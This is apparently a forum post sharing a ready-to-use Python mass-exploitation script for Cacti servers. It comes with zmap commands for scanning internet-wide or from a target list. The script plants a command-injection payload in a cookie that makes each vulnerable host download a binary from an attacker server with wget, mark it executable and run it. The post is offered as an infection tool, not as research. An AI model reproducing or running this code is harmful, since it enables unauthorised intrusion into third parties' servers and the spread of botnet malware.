Пожалуйста, обратите внимание, что пользователь заблокирован
Here you go 
-debian/ubuntu based
apt install python-requests -y,
-redhat/centos based
yum install python3-requests -y,
pip3 install parse
- list scan if you find one
zmap -p<figure out what port is common> -w list.lst -o output.txt
- world scan prolly wouldn't recommend Unless you don't care about honeypots
zmap -p<figure out what port is common> -o output.txt -N <Number Of ips you wan't to scan>
-running the script
python3 Cacti.py output.txt
press ctrl+z - to stop it cuz i was to lazy to add sigint exiting
Python:
#! python !#
import threading, sys, time, random, socket, subprocess, re, os, base64, struct, array, requests
from threading import Thread
from time import sleep
import urllib3
import requests
from requests.auth import HTTPDigestAuth
from urllib.parse import quote
from decimal import *
ips = open(sys.argv[1], "r").readlines()
port = sys.argv[2]
if len(sys.argv) < 2:
sys.exit("usage: python %s <input list> <port>" % (sys.argv[0]))
payload = ";wget${IFS}http://ip:"+port+"/binhere${IFS}-O${IFS}binhere;chmod${IFS}777${IFS}binhere;./binhere${IFS}Cacti-n0day"
cookies = {'Cacti': quote(payload)}
class rtek(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
print("\033[93m[\033[92mCacti\033[93m] \033[33mTrying \033[32m- \033[93m[\033[92m"+ self.ip +"\033[93m] \033[92m- \033[93m(\033[91mNot Infecting\033[93m)\033[37m")
url = "http://"+self.ip+"/graph_realtime.php?action=init"
req = requests.get(url)
if req.status_code == 200 and "poller_realtime.php" in req.text:
print("\033[93m[\033[92mCacti\033[93m] \033[37mFound Possible Vulnerable Device \033[32m- \033[93m[\033[92m"+ self.ip +"\033[93m]\033[37m")
requests.get(url, cookies=cookies, timeout=3, verify=False)
else:
print("\033[93m[\033[92mCacti\033[93m] \033[91mDevice Not Vulnerable \033[32m- \033[93m[\033[92m"+ self.ip +"\033[93m]\033[37m")
except Exception as e:
pass
for ip in ips:
try:
n = rtek(ip)
n.start()
# time.sleep(0.03)
except:
pass
-debian/ubuntu based
apt install python-requests -y,
-redhat/centos based
yum install python3-requests -y,
pip3 install parse
- list scan if you find one
zmap -p<figure out what port is common> -w list.lst -o output.txt
- world scan prolly wouldn't recommend Unless you don't care about honeypots
zmap -p<figure out what port is common> -o output.txt -N <Number Of ips you wan't to scan>
-running the script
python3 Cacti.py output.txt
press ctrl+z - to stop it cuz i was to lazy to add sigint exiting
Последнее редактирование: